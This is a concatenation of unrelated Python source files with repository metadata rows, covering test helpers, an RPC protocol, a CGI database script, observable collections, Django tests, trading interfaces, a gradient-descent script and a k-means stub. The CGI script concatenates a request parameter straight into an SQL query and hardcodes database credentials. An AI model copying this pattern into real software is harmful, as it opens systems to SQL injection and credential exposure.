Inits CheckPoint class
"""
super(TestStatus, self).__init__(driver)
self.resultList = []
def setResult(self, result, resultMessage):
try:
if result is not None:
if result:
self.resultList.append("PASS")
self.log.info("### VERIFICATION SUCCESSFUL :: + " + resultMessage)
self.screenShot(resultMessage)
else:
self.resultList.append("FAIL")
self.log.error("### VERIFICATION FAILED :: + " + resultMessage)
self.screenShot(resultMessage)
self.driver.get_log('driver')
else:
self.resultList.append("FAIL")
self.log.error("### VERIFICATION FAILED :: + " + resultMessage)
self.screenShot(resultMessage)
except:
self.resultList.append("FAIL")
self.log.error("### Exception Occurred !!!")
self.screenShot(resultMessage)
self.driver.get_log('driver')
print_stack()
def mark(self, result, resultMessage):
"""
Mark the result of the verification point in a test case
"""
self.setResult(result, resultMessage)
def markFinal(self, testName, result, resultMessage):
"""
Mark the final result of the verification point in a test case
This needs to be called at least once in a test case
This should be final test status of the test case
"""
self.setResult(result, resultMessage)
if "FAIL" in self.resultList:
self.log.error(testName + " ### TEST FAILED")
self.resultList.clear()
self.driver.get_log('driver')
assert True == False
else:
self.log.info(testName + " ### TEST SUCCESSFUL")
self.resultList.clear()
assert True == True | [
"mrinalini.kohli@isb.com.mt"
] | mrinalini.kohli@isb.com.mt |
10ebe15e221446bab08a4d897fc101f9d8a8b95f | a5aabe2e4057d78e687a57a6b560516a7cdb5836 | /unsserv/common/rpc/protocol.py | 688b39a308b01db7dacf58311fc8aea432c875c7 | [
"MIT"
] | permissive | aratz-lasa/py-unsserv | 0ffc09ddab65a11ce917d0faa8b1b5dff091e563 | 6f332385e55d05953186b9a8b7848bca4b878e18 | refs/heads/master | 2022-12-14T21:10:12.397834 | 2020-05-03T11:29:49 | 2020-05-03T11:29:49 | 228,329,158 | 5 | 0 | MIT | 2022-12-08T07:00:55 | 2019-12-16T07:35:20 | Python | UTF-8 | Python | false | false | 2,808 | py | import asyncio
from abc import ABC, abstractmethod
from dataclasses import is_dataclass, asdict
from enum import IntEnum
from typing import Any, Tuple, Sequence, Dict, Callable
from unsserv.common.rpc.rpc import RPCRegister, RPC
from unsserv.common.rpc.structs import Message
from unsserv.common.structs import Node
Command = IntEnum
Data = Any
Handler = Callable[..., Any]
class ITranscoder(ABC):
my_node: Node
service_id: str
def __init__(self, my_node: Node, service_id: str):
self.my_node = my_node
self.service_id = service_id
@abstractmethod
def encode(self, command: Command, *data: Data) -> Message:
pass
@abstractmethod
def decode(self, message: Message) -> Tuple[Command, Sequence[Data]]:
pass
class AProtocol:
my_node: Node
service_id: str
_rpc: RPC
_transcoder: ITranscoder
_handlers: Dict[Command, Handler]
_running: bool
def __init__(self, my_node: Node):
self.my_node = my_node
self._rpc = RPCRegister.get_rpc(my_node)
self._handlers = {}
self._running = False
async def start(self, service_id: str):
if self._running:
raise RuntimeError("Protocol already running")
self.service_id = service_id
self._transcoder = self._get_new_transcoder()
await self._rpc.register_service(service_id, self.handle_rpc)
self._running = True
async def stop(self):
if self._running:
await self._rpc.unregister_service(self.service_id)
self._running = False
async def handle_rpc(self, message: Message):
command, data = self._transcoder.decode(message)
handler = self._handlers[command]
if asyncio.iscoroutinefunction(handler):
response = await handler(message.node, *data)
return self._encode_response(response)
else:
response = handler(message.node, *data)
return self._encode_response(response)
def _encode_response(self, response: Any) -> Any:
if isinstance(response, list):
return [self._encode_response(response_item) for response_item in response]
elif isinstance(response, tuple):
return tuple(
self._encode_response(response_item) for response_item in response
)
elif hasattr(response, "encode"):
return response.encode()
elif is_dataclass(response):
return asdict(response)
elif isinstance(response, set):
return list(response)
return response
@abstractmethod
def _get_new_transcoder(self):
"""
Method for initializing ITranscoder, because every Protocol implements
its own.
:return:
"""
pass
| [
"aratzml@opendeusto.es"
] | aratzml@opendeusto.es |
5d41fc1b4840c61f58064418129e660b614f0dc1 | 9afbf45fb02eef2145f7416f05bfbd4c3c0954ec | /getStats.cgi | b7ad6a5f44627b07d12131b221617bbd0d8b7464 | [] | no_license | drl222/drl222.github.io | a3426aa13311d2748c7abb637578c94941bc333c | 23fec94abb998ab1bd534f7d00677bfe16c48ed0 | refs/heads/master | 2023-05-28T13:00:31.519684 | 2023-04-26T01:58:33 | 2023-04-26T01:58:33 | 78,591,091 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,059 | cgi | #!/usr/bin/python
import MySQLdb as mdb
import sys
import cgi
print "Content-type: text\html\n"
print "{"
form = cgi.FieldStorage()
id = "1"
if form.has_key('id'):
id = form['id'].value
try:
con = mdb.connect('localhost', 'dlin', 'dlin2dlin', 'dlin')
sql= "select name, StrCap, MagCap, SklCap, SpdCap, LckCap, DefCap, ResCap from FireEmblem WHERE id=" + id
with con:
cur=con.cursor(mdb.cursors.DictCursor)
cur.execute(sql)
row=cur.fetchone()
print "\"name\":\"" + str(row["name"]) + "\","
print "\"StrCap\":\"" + str(row["StrCap"]) + "\","
print "\"MagCap\":\"" + str(row["MagCap"]) + "\","
print "\"SklCap\":\"" + str(row["SklCap"]) + "\","
print "\"SpdCap\":\"" + str(row["SpdCap"]) + "\","
print "\"LckCap\":\"" + str(row["LckCap"]) + "\","
print "\"DefCap\":\"" + str(row["DefCap"]) + "\","
print "\"ResCap\":\"" + str(row["ResCap"]) + "\""
except mdb.Error, e:
print "Error %d: %s" % (e.args[0],e.args[1])
sys.exit(1)
finally:
if con:
con.close()
print "}"
| [
"drl222@cornell.edu"
] | drl222@cornell.edu |
1fc201d942e296adbcf250786df3f816a80ddebd | e6c65e2e354336a4bea5b6a4ccbccd3682915fe2 | /out-bin/py/google/fhir/seqex/bundle_to_seqex_test.runfiles/com_google_fhir/external/pypi__nose_1_3_7/nose/plugins/testid.py | 3bd121362c001ad4cc26af2877fb5c2b5dc40673 | [
"Apache-2.0"
] | permissive | rasalt/fhir-datalab | c30ab773d84983dd04a37e9d0ddec8bf2824b8a4 | 3e329fc8b4226d3e3a4a7c23c306a86e7a9ea0de | refs/heads/master | 2021-10-09T05:51:04.593416 | 2018-12-21T18:11:03 | 2018-12-22T05:38:32 | 162,744,237 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 125 | py | /home/rkharwar/.cache/bazel/_bazel_rkharwar/0ddaa3627472ad9d1367a008236ce2f5/external/pypi__nose_1_3_7/nose/plugins/testid.py | [
"ruchika.kharwar@gmail.com"
] | ruchika.kharwar@gmail.com |
4e22230cbb8d92d0afba050b7b30a7dd44fb55e2 | 4f4af7ed2004ed0223a64c5d1ec4c588ba246eaa | /lib/voxelengine/modules/observableCollections.py | 089ae2284ee498bde924f05923aaee840d00e46a | [
"MIT"
] | permissive | bertwesarg/MCG_CRAFT | c88ca9a05bb174cfe74e035b8558d90c673c81db | 95cc51189dcf62d871e726d045f1e7b27d0d6261 | refs/heads/master | 2020-04-27T08:36:15.637677 | 2018-06-14T17:11:16 | 2018-06-14T17:11:16 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 4,523 | py | # data that should be representable: containers: dicts, lists; literals: ints, floats, strings
# should be able to subscribe to each of them to be noticed of changes
# should be possible to move stuff (observer move with it) and copy stuff (observers stay where they are)
# when something is changed that implies that all parents have to call their callbacks as well
import collections, itertools
def observable_from(data):
if isinstance(data, Observable):
return data
if isinstance(data, dict):
return ObservableDict(data)
if isinstance(data, list):
return ObservableList(data)
return data
class Observable(object):
def __init__(self):
self.parent = None
self.parent_key = None
self.item_callbacks = collections.defaultdict(set)
self.callbacks = set()
self.sanitizers = dict()
self.data #define self.data in __init__ of subclass! (before calling Observable.__init__)
def __repr__(self):
return repr(self.data)
def __len__(self):
return len(self.data)
def __getitem__(self,key):
return self.data[key]
def get(self, key, default=None):
try:
return self.data[key]
except (KeyError,IndexError):
return default
def _adopted_value(self,value,static_key=None):
value = self.sanitizers.get(static_key,lambda x:x)(value)
value = observable_from(value)
if isinstance(value,Observable):
assert value.parent == None
value.parent = self
value.parent_key = static_key
return value
def __setitem__(self,key,value):
static_key = key if self.static_keys else None
value = self._adopted_value(value,static_key)
self.data[key] = value
self.trigger(static_key)
def register_callback(self,callback,initial_call=True):
self.callbacks.add(callback)
if initial_call:
callback(self)
def unregister_callback(self,callback):
self.callbacks.remove(callback)
def register_item_callback(self,callback,key,initial_call=True):
self.item_callbacks[key].add(callback)
if initial_call:
callback(self[key])
def unregister_item_callback(self,callback,key):
self.item_callbacks[key].remove(callback)
def register_item_sanitizer(self,sanitizer,key,initial_call=True):
self.sanitizers[key] = sanitizer
try:
value = self[key]
except (KeyError, IndexError):
pass
else:
self[key] = sanitizer(value)
def trigger(self,key):
for callback in self.item_callbacks[key]:
callback(self.get(key))
for callback in self.callbacks:
callback(self)
if self.parent:
self.parent.trigger(self.parent_key)
def copy(self):
raise NotImplementedError()
class ObservableDict(Observable):
static_keys = True
def __init__(self,data={}):
self.data = {}
Observable.__init__(self)
self.dict_update(data)
def dict_update(self,data):
for key in data:
self[key] = data[key]
def setdefault(self, key, value):
if key not in self.data:
self[key] = value
return self[key]
class ObservableList(Observable):
static_keys = False
def __init__(self,data=[]):
self.data = []
Observable.__init__(self)
self.extend(data)
def extend(self,values):
self.data.extend(map(self._adopted_value,values))
self.trigger(None)
def append(self,value):
self.data.append(self._adopted_value(value))
self.trigger(None)
def insert(self,index,value):
self.data.insert(index,self._adopted_value(value))
self.trigger(None)
def pop(self,index):
value = self.data.pop(index)
if isinstance(value, Observable):
value.parent = None
self.trigger(None)
return value
def count(self,*args,**kwargs):
return self.data.count(*args,**kwargs)
def index(self,*args,**kwargs):
return self.data.index(*args,**kwargs)
def remove(self, value):
self.pop(self.index(value))
if __name__ == "__main__":
root = observable_from({"a":7,"b":[1,2,3]})
root.setdefault("c",[4])
root["c"].append(2)
root["c"].remove(4)
print type(root["c"]), root["c"]
a = observable_from({1:2})
b = observable_from({1:2})
| [
"joram.brenz@online.de"
] | joram.brenz@online.de |
511ae46f20518493cb4f1b1318575f083d02d117 | f3c9583ea4952cd909cad6b3a2a1b835b305c480 | /myproject/cmsuserput/models.py | 47018820fd7e42715d59f05c81fa49492430f227 | [
"Apache-2.0"
] | permissive | sgomezleon/X-Serv-15.8-CmsUsersPut | 73f72dc3196d0e781eb843dedd8ad06aed207bda | 9063c8e3356cbfd31fb1674264f1b86f4a6fd3ff | refs/heads/master | 2020-12-30T13:39:23.298477 | 2017-05-16T11:45:47 | 2017-05-16T11:45:47 | 91,238,153 | 0 | 0 | null | 2017-05-14T11:14:38 | 2017-05-14T11:14:38 | null | UTF-8 | Python | false | false | 156 | py | from django.db import models
# Create your models here.
class Pages(models.Model):
nombre = models.CharField(max_length=32)
pagina = models.TextField()
| [
"sergom19@hotmail.com"
] | sergom19@hotmail.com |
f317a5007f4c57e06f65dd02a55d4a3a37bee497 | b27543728fe3de41b2ba7666b2ec8ee4c378f6f8 | /blog/tests.py | ca795734c1e8148c513d11793f5d30e3e26c2caa | [] | no_license | jasonantao/image_repository | 2fddd5dbee366dbb8e5204d2a73ee4d1a9c6566a | c8b2426a793d182763f6f8a33ee473a786363879 | refs/heads/master | 2023-07-12T06:27:18.141249 | 2021-08-14T13:43:42 | 2021-08-14T13:43:42 | 365,867,662 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,256 | py | from django.test import TestCase
from django.utils import timezone
from blog.models import Post
from users.models import User
# Test Case Suite for Posts: image entries
class BlogTestCasesBase(TestCase):
@classmethod
def setUpTestData(cls):
User.objects.create()
user = User.objects.get(id=1)
Post.objects.create(title="test_title", content="lake", author=user)
# Tests to_string method to output post title
def test_blog_title_str(self):
post = Post.objects.get(id=1)
self.assertEqual(str(post), "test_title")
# Tests default for file extension
def test_def_file_extension(self):
post = Post.objects.get(id=1)
self.assertEqual(post.extension(), "")
# Tests getting the url for viewing post information
def test_get_absolute_url(self):
post = Post.objects.get(id=1)
self.assertEqual(post.get_absolute_url(), "/post/1/")
# Tests maximum length of post title - a business logic restriction
def test_post_title_max_allowed(self):
post = Post.objects.get(id=1)
field_max_length = post._meta.get_field('title').max_length
self.assertEqual(field_max_length, 100)
| [
"jasantao99@gmail.com"
] | jasantao99@gmail.com |
17ae1f4270a5e2ebf48e65265aafc3399ecba836 | 6fa7f99d3d3d9b177ef01ebf9a9da4982813b7d4 | /E9FwvGyad5CDbiH4C_14.py | 47f2553b08320fb3dbcb4e7c16ad17e66bc52e21 | [] | no_license | daniel-reich/ubiquitous-fiesta | 26e80f0082f8589e51d359ce7953117a3da7d38c | 9af2700dbe59284f5697e612491499841a6c126f | refs/heads/master | 2023-04-05T06:40:37.328213 | 2021-04-06T20:17:44 | 2021-04-06T20:17:44 | 355,318,759 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 157 | py |
def block(lst):
lista = [list(i) for i in list(zip(*lst)) if 2 in i]
q = 0
for i in lista:
q += len(i) - (i.index(2) + 1)
return q
| [
"daniel.reich@danielreichs-MacBook-Pro.local"
] | daniel.reich@danielreichs-MacBook-Pro.local |
5291a4e62f1203d202f5c29a65877e4c53f50559 | 3798583928530b4c5366e2dace526a4ce3e0c9bd | /rqrobot/interface.py | 6f6d55ef94e404bb6b2156a273083b4e92328a30 | [
"Apache-2.0"
] | permissive | luhouxiang/rqrobot | bc80a5458f8a8c0631e566d781db1497939b641f | 0b0094b0e2d061e628c570a06a7620e5fb48d342 | refs/heads/master | 2020-05-17T14:40:04.495201 | 2019-05-04T13:17:04 | 2019-05-04T13:17:04 | 183,768,782 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 19,641 | py | # -*- coding: utf-8 -*-
#
# Copyright 2017 Ricequant, Inc
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import abc
from six import with_metaclass
class AbstractAccount(with_metaclass(abc.ABCMeta)):
"""
账户接口,主要用于构建账户信息
您可以在 Mod 的 start_up 阶段通过 env.set_account_model(account_type, AccountModel) 来注入和修改 AccountModel
您也可以通过 env.get_account_model(account_type) 来获取指定类型的 AccountModel
"""
@abc.abstractmethod
def fast_forward(self, orders, trades):
"""
[Required]
fast_forward 函数接受当日订单数据和成交数据,从而将当前的持仓快照快速推进到最新持仓状态
:param list orders: 当日订单列表
:param list trades: 当日成交列表
"""
raise NotImplementedError
@abc.abstractmethod
def order(self, order_book_id, quantity, style, target=False):
"""
[Required]
系统下单函数会调用该函数来完成下单操作
"""
raise NotImplementedError
@abc.abstractmethod
def get_state(self):
"""
[Required]
主要用于进行持久化时候,提供对应需要持久化的数据
"""
raise NotImplementedError
@abc.abstractmethod
def set_state(self, state):
"""
[Requried]
主要用于持久化恢复时,根据提供的持久化数据进行恢复Account的实现
"""
raise NotImplementedError
@abc.abstractproperty
def type(self):
"""
[Required]
返回 String 类型的账户类型标示
"""
raise NotImplementedError
@abc.abstractproperty
def positions(self):
"""
[Required]
返回当前账户的持仓数据
:return: Positions(PositionModel)
"""
raise NotImplementedError
@abc.abstractproperty
def frozen_cash(self):
"""
[Required]
返回当前账户的冻结资金
"""
raise NotImplementedError
@abc.abstractproperty
def cash(self):
"""
[Required]
返回当前账户的可用资金
"""
raise NotImplementedError
@abc.abstractproperty
def market_value(self):
"""
[Required]
返回当前账户的市值
"""
raise NotImplementedError
@abc.abstractproperty
def total_value(self):
"""
[Required]
返回当前账户的总权益
"""
raise NotImplementedError
@abc.abstractproperty
def transaction_cost(self):
"""
[Required]
返回当前账户的当日交易费用
"""
raise NotImplementedError
class AbstractBookingPosition(with_metaclass(abc.ABCMeta)):
@property
@abc.abstractmethod
def order_book_id(self):
raise NotImplementedError
@property
@abc.abstractmethod
def direction(self):
raise NotImplementedError
class AbstractPosition(with_metaclass(abc.ABCMeta)):
"""
仓位接口,主要用于构建仓位信息
您可以在 Mod 的 start_up 阶段通过 env.set_position_model(account_type, PositionModel) 来注入和修改 PositionModel
您也可以通过 env.get_position_model(account_type) 来获取制定类型的 PositionModel
"""
@abc.abstractmethod
def get_state(self):
"""
[Required]
主要用于进行持久化时候,提供对应需要持久化的数据
"""
raise NotImplementedError
@abc.abstractmethod
def set_state(self, state):
"""
[Requried]
主要用于持久化恢复时,根据提供的持久化数据进行恢复 Position 的实现
"""
raise NotImplementedError
@abc.abstractmethod
def order_book_id(self):
"""
[Required]
返回当前持仓的 order_book_id
"""
raise NotImplementedError
@abc.abstractproperty
def type(self):
"""
[Required]
返回 String 类型的账户类型标示
"""
raise NotImplementedError
@abc.abstractproperty
def market_value(self):
"""
[Required]
返回当前持仓的市值
"""
raise NotImplementedError
@abc.abstractproperty
def transaction_cost(self):
"""
[Required]
返回当前持仓的当日交易费用
"""
raise NotImplementedError
class AbstractStrategyLoader(with_metaclass(abc.ABCMeta)):
"""
策略加载器,其主要作用是加载策略,并将策略运行所需要的域环境传递给策略执行代码。
在扩展模块中,可以通过调用 ``env.set_strategy_loader`` 来替换默认的策略加载器。
"""
@abc.abstractmethod
def load(self, scope):
"""
[Required]
load 函数负责组装策略代码和策略代码所在的域,并输出最终组装好的可执行域。
:param dict scope: 策略代码运行环境,在传入时,包含了所有基础API。
通过在 scope 中添加函数可以实现自定义API;通过覆盖 scope 中相应的函数,可以覆盖原API。
:return: scope,其中应包含策略相应函数,如 ``init``, ``before_trading`` 等
"""
raise NotImplementedError
class AbstractEventSource(with_metaclass(abc.ABCMeta)):
"""
事件源接口。rqrobot 从此对象中获取事件,驱动整个事件循环。
在扩展模块中,可以通过调用 ``env.set_event_source`` 来替换默认的事件源。
"""
@abc.abstractmethod
def events(self, start_date, end_date, frequency):
"""
[Required]
扩展 EventSource 必须实现 events 函数。
events 是一个 event generator, 在相应事件的时候需要以如下格式来传递事件
.. code-block:: python
yield trading_datetime, calendar_datetime, EventEnum
其中 trading_datetime 为基于交易日的 datetime, calendar_datetime 为基于自然日的 datetime (因为夜盘的存在,交易日和自然日未必相同)
EventEnum 为 :class:`~Events`
:param datetime.date start_date: 起始日期, 系统会将 `config.base.start_date` 传递 events 函数
:param datetime.date end_date: 结束日期,系统会将 `config.base.end_date` 传递给 events 函数
:param str frequency: 周期频率,`1d` 表示日周期, `1m` 表示分钟周期
:return: None
"""
raise NotImplementedError
class AbstractPriceBoard(with_metaclass(abc.ABCMeta)):
"""
rqrobot多个地方需要使用最新「行情」,不同的数据源其最新价格获取的方式不尽相同
因此抽离出 `AbstractPriceBoard`, 您可以自行进行扩展并替换默认 PriceBoard
"""
@abc.abstractmethod
def get_last_price(self, order_book_id):
"""
获取证券的最新价格
"""
raise NotImplementedError
@abc.abstractmethod
def get_limit_up(self, order_book_id):
raise NotImplementedError
@abc.abstractmethod
def get_limit_down(self, order_book_id):
raise NotImplementedError
def get_a1(self, order_book_id):
raise NotImplementedError
def get_b1(self, order_book_id):
raise NotImplementedError
class AbstractDataSource(object):
"""
数据源接口。rqrobot 中通过 :class:`DataProxy` 进一步进行了封装,向上层提供更易用的接口。
在扩展模块中,可以通过调用 ``env.set_data_source`` 来替换默认的数据源。可参考 :class:`BaseDataSource`。
"""
def get_all_instruments(self):
"""
获取所有Instrument。
:return: list[:class:`~Instrument`]
"""
raise NotImplementedError
def get_trading_calendar(self):
"""
获取交易日历
:return: list[`pandas.Timestamp`]
"""
raise NotImplementedError
def get_yield_curve(self, start_date, end_date, tenor=None):
"""
获取国债利率
:param pandas.Timestamp str start_date: 开始日期
:param pandas.Timestamp end_date: 结束日期
:param str tenor: 利率期限
:return: pandas.DataFrame, [start_date, end_date]
"""
raise NotImplementedError
def get_dividend(self, order_book_id):
"""
获取股票/基金分红信息
:param str order_book_id: 合约名
:return:
"""
raise NotImplementedError
def get_split(self, order_book_id):
"""
获取拆股信息
:param str order_book_id: 合约名
:return: `pandas.DataFrame`
"""
raise NotImplementedError
def get_bar(self, instrument, dt, frequency):
"""
根据 dt 来获取对应的 Bar 数据
:param instrument: 合约对象
:type instrument: :class:`~Instrument`
:param datetime.datetime dt: calendar_datetime
:param str frequency: 周期频率,`1d` 表示日周期, `1m` 表示分钟周期
:return: `numpy.ndarray` | `dict`
"""
raise NotImplementedError
def get_settle_price(self, instrument, date):
"""
获取期货品种在 date 的结算价
:param instrument: 合约对象
:type instrument: :class:`~Instrument`
:param datetime.date date: 结算日期
:return: `str`
"""
raise NotImplementedError
def history_bars(self, instrument, bar_count, frequency, fields, dt, skip_suspended=True,
include_now=False, adjust_type='pre', adjust_orig=None):
"""
获取历史数据
:param instrument: 合约对象
:type instrument: :class:`~Instrument`
:param int bar_count: 获取的历史数据数量
:param str frequency: 周期频率,`1d` 表示日周期, `1m` 表示分钟周期
:param str fields: 返回数据字段
========================= ===================================================
fields 字段名
========================= ===================================================
datetime 时间戳
open 开盘价
high 最高价
low 最低价
close 收盘价
volume 成交量
total_turnover 成交额
datetime int类型时间戳
open_interest 持仓量(期货专用)
basis_spread 期现差(股指期货专用)
settlement 结算价(期货日线专用)
prev_settlement 结算价(期货日线专用)
========================= ===================================================
:param datetime.datetime dt: 时间
:param bool skip_suspended: 是否跳过停牌日
:param bool include_now: 是否包含当天最新数据
:param str adjust_type: 复权类型,'pre', 'none', 'post'
:param datetime.datetime adjust_orig: 复权起点;
:return: `numpy.ndarray`
"""
raise NotImplementedError
def history_ticks(self, instrument, count, dt):
"""
获取历史tick数据
:param instrument: 合约对象
:type instrument: :class:`~Instrument`
:param int count: 获取的历史数据数量
:param str fields: 返回数据字段
:param datetime.datetime dt: 时间
:return: list of `Tick`
"""
raise NotImplementedError
def current_snapshot(self, instrument, frequency, dt):
"""
获得当前市场快照数据。只能在日内交易阶段调用,获取当日调用时点的市场快照数据。
市场快照数据记录了每日从开盘到当前的数据信息,可以理解为一个动态的day bar数据。
在目前分钟回测中,快照数据为当日所有分钟线累积而成,一般情况下,最后一个分钟线获取到的快照数据应当与当日的日线行情保持一致。
需要注意,在实盘模拟中,该函数返回的是调用当时的市场快照情况,所以在同一个handle_bar中不同时点调用可能返回的数据不同。
如果当日截止到调用时候对应股票没有任何成交,那么snapshot中的close, high, low, last几个价格水平都将以0表示。
:param instrument: 合约对象
:type instrument: :class:`~Instrument`
:param str frequency: 周期频率,`1d` 表示日周期, `1m` 表示分钟周期
:param datetime.datetime dt: 时间
:return: :class:`~Snapshot`
"""
raise NotImplementedError
def get_trading_minutes_for(self, instrument, trading_dt):
"""
获取证券某天的交易时段,用于期货回测
:param instrument: 合约对象
:type instrument: :class:`~Instrument`
:param datetime.datetime trading_dt: 交易日。注意期货夜盘所属交易日规则。
:return: list[`datetime.datetime`]
"""
raise NotImplementedError
def available_data_range(self, frequency):
"""
此数据源能提供数据的时间范围
:param str frequency: 周期频率,`1d` 表示日周期, `1m` 表示分钟周期
:return: (earliest, latest)
"""
raise NotImplementedError
def get_margin_info(self, instrument):
"""
获取合约的保证金数据
:param instrument: 合约对象
:return: dict
"""
raise NotImplementedError
def get_commission_info(self, instrument):
"""
获取合约的手续费信息
:param instrument:
:return:
"""
raise NotImplementedError
def get_tick_size(self, instrument):
"""
获取合约的 tick size
:param instrument:
:return:
"""
raise NotImplementedError
def get_merge_ticks(self, order_book_id_list, trading_date, last_dt=None):
"""
获取合并的 ticks
:param list order_book_id_list: 合约名列表
:param datetime.date trading_date: 交易日
:param datetime.datetime last_dt: 仅返回 last_dt 之后的时间
:return: Iterable object of Tick
"""
raise NotImplementedError
class AbstractBroker(with_metaclass(abc.ABCMeta)):
"""
券商接口。
rqrobot 将产生的订单提交给此对象,此对象负责对订单进行撮合(不论是自行撮合还是委托给外部的真实交易所),
并通过 ``EVENT.ORDER_*`` 及 ``EVENT.TRADE`` 事件将撮合结果反馈进入 rqrobot。
在扩展模块中,可以通过调用 ``env.set_broker`` 来替换默认的 Broker。
"""
@abc.abstractmethod
def get_portfolio(self):
"""
[Required]
获取投资组合。系统初始化时,会调用此接口,获取包含账户信息、净值、份额等内容的投资组合
:return: Portfolio
"""
raise NotImplementedError
@abc.abstractmethod
def get_booking(self):
raise NotImplementedError
@abc.abstractmethod
def submit_order(self, order):
"""
[Required]
提交订单。在当前版本,rqrobot 会生成 :class:`~Order` 对象,再通过此接口提交到 Broker。
TBD: 由 Broker 对象生成 Order 并返回?
"""
raise NotImplementedError
@abc.abstractmethod
def cancel_order(self, order):
"""
[Required]
撤单。
:param order: 订单
:type order: :class:`~Order`
"""
raise NotImplementedError
@abc.abstractmethod
def get_open_orders(self, order_book_id=None):
"""
[Required]
获得当前未完成的订单。
:return: list[:class:`~Order`]
"""
raise NotImplementedError
class AbstractMod(with_metaclass(abc.ABCMeta)):
"""
扩展模块接口。
"""
@abc.abstractmethod
def start_up(self, env, mod_config):
"""
rqrobot 在系统启动时会调用此接口;在此接口中,可以通过调用 ``env`` 的相应方法来覆盖系统默认组件。
:param env: 系统环境
:type env: :class:`~Environment`
:param mod_config: 模块配置参数
"""
raise NotImplementedError
def tear_down(self, code, exception=None):
"""
rqrobot 在系统退出前会调用此接口。
:param code: 退出代码
:type code: rqrobot.const.EXIT_CODE
:param exception: 如果在策略执行过程中出现错误,此对象为相应的异常对象
"""
raise NotImplementedError
class AbstractPersistProvider(with_metaclass(abc.ABCMeta)):
"""
持久化服务提供者接口。
扩展模块可以通过调用 ``env.set_persist_provider`` 接口来替换默认的持久化方案。
"""
@abc.abstractmethod
def store(self, key, value):
"""
store
:param str key:
:param bytes value:
:return:
"""
raise NotImplementedError
@abc.abstractmethod
def load(self, key):
"""
:param str key:
:return: bytes 如果没有对应的值,返回 None
"""
raise NotImplementedError
class Persistable(with_metaclass(abc.ABCMeta)):
@abc.abstractmethod
def get_state(self):
"""
:return: bytes
"""
raise NotImplementedError
@abc.abstractmethod
def set_state(self, state):
"""
:param state: bytes
:return:
"""
raise NotImplementedError
@classmethod
def __subclasshook__(cls, C):
if cls is Persistable:
if (any("get_state" in B.__dict__ for B in C.__mro__) and
any("set_state" in B.__dict__ for B in C.__mro__)):
return True
return NotImplemented
class AbstractFrontendValidator(with_metaclass(abc.ABCMeta)):
@abc.abstractmethod
def can_submit_order(self, account, order):
# FIXME: need a better name
raise NotImplementedError
@abc.abstractmethod
def can_cancel_order(self, account, order):
# FIXME: need a better name
raise NotImplementedError
class AbstractTransactionCostDecider((with_metaclass(abc.ABCMeta))):
@abc.abstractmethod
def get_trade_tax(self, trade):
raise NotImplementedError
@abc.abstractmethod
def get_trade_commission(self, trade):
raise NotImplementedError
@abc.abstractmethod
def get_order_transaction_cost(self, order):
raise NotImplementedError
| [
"luhouxiang@hotmail.com"
] | luhouxiang@hotmail.com |
52684d032e130aa5832ff8c8c1994cdfb5d2d577 | f34c4a59e9f396b72dcb79ea059645aea19b8ac8 | /optimizer_(gradient_desent).py | e934d633f50994da24b7774f8efb841765d4f940 | [] | no_license | tao-Isaman/575863-OPTIMIZATION-AND-NONLINEAR-EQUATIONS | dae697161ebaea7878da741fe04cb74c498106a9 | dea658dc51a72984e47bfd9d83a6d033748f68dd | refs/heads/main | 2023-08-16T16:26:04.636812 | 2021-09-26T19:59:20 | 2021-09-26T19:59:20 | 401,220,871 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,593 | py | # -*- coding: utf-8 -*-
"""Optimizer (Gradient Desent)
Automatically generated by Colaboratory.
Original file is located at
https://colab.research.google.com/drive/1orIQkUXrqzGBFBt6zvGBNUsksabU78Zp
"""
from numpy import cos
def derivative(input_fuction, x):
'''
return derivative of function of x
'''
h = 0.0001
return (input_fuction(x + h) - input_fuction(x)) / h
def tao_optimizer(input_function, next_x, optimizer, firstDistance):
next_distance = derivative(input_function,next_x)
print(firstDistance , next_distance)
return optimizer * (1 + (next_distance/firstDistance))
def find_minima(input_function,x0,round,optimizer) :
'''
find x where x is give a minimum value of function
'''
loss = []
current_x = x0
learnign_rate = optimizer
firstDistance = derivative(input_function,current_x)
for i in range(round):
next_x = current_x - learnign_rate * derivative(input_function , current_x)
loss.append(next_x)
if (next_x == current_x):
print("x is not change")
return loss
# change optimizer
learnign_rate = tao_optimizer(input_function,next_x, learnign_rate , firstDistance)
# change x
current_x = next_x
print("learnign_rate = " ,learnign_rate)
print("evaluate = ", derivative(input_function,current_x))
print(i, current_x)
return loss
# objective_function = lambda x: 5*x**2 - 2*x - 1
objective_function = lambda x: (5*x**2) - (5*x) + 1
x = find_minima(objective_function, 5, 1000, 0.01)
print(x[-1])
derivative(objective_function, x[-1])
import matplotlib.pyplot as plt
plt.plot(x) | [
"towlovelove@gmail.com"
] | towlovelove@gmail.com |
a7835c49a5f9085e2bc36f1eb12e5cb77087e647 | 1576f88a3f096426c9f02ff45b9b6fb09eee54e9 | /kmeans.py | 47c5139e0fbff0af64a1f9f57afd3c74f9cfd9e2 | [
"MIT"
] | permissive | fokoa/kmeans_from_scratch | 665742f27503ded50b2b2e7f6c4df1223d6538f4 | 4aa19b886232f766b623985205309365de7eb4b9 | refs/heads/main | 2023-09-03T06:55:52.107137 | 2021-11-22T13:17:45 | 2021-11-22T13:17:45 | 430,706,397 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 7,940 | py | #!usr/bin/python3
# -*- coding : utf8 -*-
import random;
import numpy as np;
from functions import *;
class KMeans:
'''
K-means clustering for grouping data into K groups of similar objects
Parameters
----------
n_iter : int, default=100
Number of iterations that will do k-means
init : 'kmeans++' or random' or 'iter', default='kmeans++'
Centroids initialization method
n_clusters : int, default=3
Number of clusters or centroids where the samples
will be grouped. It is famous K of K-means.
n_init : int, default=100
Number of time the k-means algorithm will be run with
different centroid seeds. The final results will be
the best output of n_init consecutive runs in terms of inertia.
seed : int, default=None
For the reproducibility
